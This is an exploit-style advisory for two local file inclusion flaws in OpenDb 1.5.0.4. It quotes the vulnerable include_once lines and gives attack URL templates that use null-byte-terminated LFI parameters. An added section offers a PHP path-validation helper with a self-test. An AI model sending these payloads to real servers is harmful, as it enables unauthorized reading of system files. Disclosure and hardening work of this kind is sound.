==============================================================================
[»] ~ Note : Works Only With Magic_Quotes_Gpc = Off .
==============================================================================
[»] OpenDb 1.5.0.4 Multiple LFI Vulnerability
==============================================================================

[»] Script:     [ OpenDb ]
[»] Language:   [ PHP ]
[»] Site page:  [ The Open Media Collectors Database is a PHP and MySQL based inventory application ]
[»] Download:   [ http://sourceforge.net/projects/opendb/files/ ]
[»] Founder:    [ ViRuSMaN ]
[»] Greetz to:  [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[»] My Home:    [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

#~ [C:\AppServ\www\Scripts\opendb\include\begin.inc.php]
#~ Line 213 : include_once("./theme/$_OPENDB_THEME/theme.php");

[»] http://target/path/include/begin.inc.php?_OPENDB_THEME=[LFI%00]

===[ Exploit 2 ]===

#~ [C:\AppServ\www\Scripts\opendb\functions\site_plugin.php]
#~ Line 126 : include_once("./site/".$site_plugin_classname.".class.php");

[»] http://target/path/functions/site_plugin.php?site_plugin_classname=[LFI%00]

Author: ViRuSMaN <-

###########################################################################
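[»] Added example, not part of the original advisory and not OpenDb code: one way to harden the two include_once() calls quoted above, by allowing only simple identifiers and checking that the resolved file stays under the intended directory. The helper name safe_include_path(), the temporary directory layout and the sample names are assumptions made for this illustration; it assumes PHP 7.1 or later.

```php
<?php
// Added example (hypothetical helper, not OpenDb code): resolve a
// request-influenced name to a file under a fixed base directory.
// Returns the real path, or null when the name must be rejected.
function safe_include_path(string $baseDir, string $name, string $suffix): ?string
{
    // Only plain identifiers: no slashes, dots, NUL bytes or empty names.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() fails for missing files and resolves ".." and symlinks,
    // so the prefix check below compares canonical paths.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . $suffix);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed self-check: a throwaway tree shaped like ./theme and ./site.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . uniqid('opendb_demo_');
mkdir($root . '/theme/default', 0700, true);
mkdir($root . '/site', 0700, true);
file_put_contents($root . '/theme/default/theme.php', "<?php // demo theme\n");
file_put_contents($root . '/site/demo.class.php', "<?php // demo plugin\n");

// Constructed sample names: one valid, then traversal, NUL byte, unknown.
foreach (['default', '../outside', "default\0", 'missing'] as $theme) {
    $file = safe_include_path($root . '/theme', $theme, '/theme.php');
    printf("theme  %-14s => %s\n", addcslashes($theme, "\0"), $file ?? 'rejected');
}
foreach (['demo', '../theme/default/theme.php'] as $class) {
    $file = safe_include_path($root . '/site', $class, '.class.php');
    printf("plugin %-14s => %s\n", substr($class, 0, 14), $file ?? 'rejected');
}

// In the application, include only a non-null result:
//   $file = safe_include_path('./theme', $_OPENDB_THEME, '/theme.php');
//   if ($file !== null) { include_once $file; }
```

[»] Only "default" and "demo" resolve to a path; every other sample name is rejected before include_once() would be reached.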